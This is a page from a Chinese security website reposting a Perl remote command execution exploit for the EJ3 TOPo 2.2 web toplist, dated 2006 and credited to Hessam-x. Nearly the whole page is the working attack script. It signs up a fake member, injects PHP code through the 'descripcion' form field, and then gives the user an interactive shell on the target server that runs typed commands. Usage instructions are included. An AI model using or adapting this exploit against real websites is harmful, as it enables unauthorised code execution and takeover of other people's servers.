首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
EJ3 TOPo 2.2 (descripcion) Remote Command Execution Exploit
来源:www.Hackerz.Ir 作者:Hessam-x 发布时间:2006-07-11  

#!/usr/bin/perl
#
# EJ3 TOPO 2.2 Remote Code Execution Exploit
# ---------------------------------------------
# Note : This Exploit Just run TOPO 2.2
# IHST : www.Hackerz.Ir
# AST : www.aria-security.net
###### (C)oded & Discovered By Hessam-x

use LWP::UserAgent;
use LWP::Simple;
use HTTP::Cookies;


$host = $ARGV[0];

$url = "http://".$host;

&hed;
print " [~] Host : $host \n";
print " [~] Conecting ...\n";


$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();
$xpl->cookie_jar( $cookie_jar );

$res = $xpl->post($url.'index.php',
Content => [
"email" => "info@yahoo.com",
"web" => "Yahoo.Com",
"webURL" => "http://www.yahoo.com",
"BannerURL" => "http://www.yahoo.com/logo.jpg",
"descripcion" => "YAHOO!INC",
"country" => "as",
"m" => "members",
"s" => "html",
"t" => "join",
"paso" => "2",
"ID" => "shell",
],);

print " [+] Created a user ...\n";
&run;


sub hed()
{
print q(
###########################################################
# EJ3 TOPO <= 2.1 Remote Code Execution Exploit #
# #
############# Coded & discovered By Hessam-x ##############

);


if (@ARGV < 1) {
print " # usage : hx.pl [host&path]\n";
print " # E.g : hx.pl www.milw0rm.com/toplist/\n";
exit();
}

}

while ()
{
&run
}
sub run()
{

print "\n[Shell]\$";
chomp($exc=<STDIN>);

exit() if ($exc eq 'exit');



$commd = "system(\"$exc\")";
$cmd = 'echo 1 ; echo _START_ ; '.$commd.' ; echo _END_';


$req = $xpl->post($url.'index.php',
Content => [
"passwordNEW" => "0",
"email" => "info@yahoo.com",
"webURL" => "http://www.yahoo.com",
"BannerURL" => "http://www.yahoo.com/logo.jpg",
"descripcion" => "YAHOO!INC' ; $cmd ; ?>//",
"country" => "unknow",
"m" => "members",
"s" => "html",
"t" => "edit",
"paso" => "2",
"password" => "0",
"ID" => "shell",
],);
$res = $xpl->get($url.'index.php?m=top&s=out&ID=shell');
@result = split(/\n/,$res->content);
$runned = 0;
$on = 0;
print "\n";
for $res(@result)
{
if ($res =~ /^_END_/) { print "\n"; return 0; }
if ($on == 0) { print " $res\n"; }
if ($res =~ /^_START_/) { $on = 1; $runned = 1; }
}
if (!$runned) { print "Can not execute command . EXPLOIT FAILED !\n" ; };



}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·SipXtapi SIP Remote Buffer Ove
·Linux Kernel 2.6.13 <= 2.6.
·Microsoft Word 2000/2003 Hlink
·Linux Kernel 2.6.13 <= 2.6.
·Ottoman CMS <= 1.1.3 (defau
·Linux Kernel 2.6.13 <= 2.6.
·Webmin < 1.290 / Usermin &l
·phpBB 3 (memberlist.php) Remot
·PAPOO <= 3_RC3 SQL Injectio
·Invision Power Board 2.1 <=
·WinRAR <= 3.60 beta 6 (SFX
·Linux Kernel 2.6.13 <= 2.6.
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved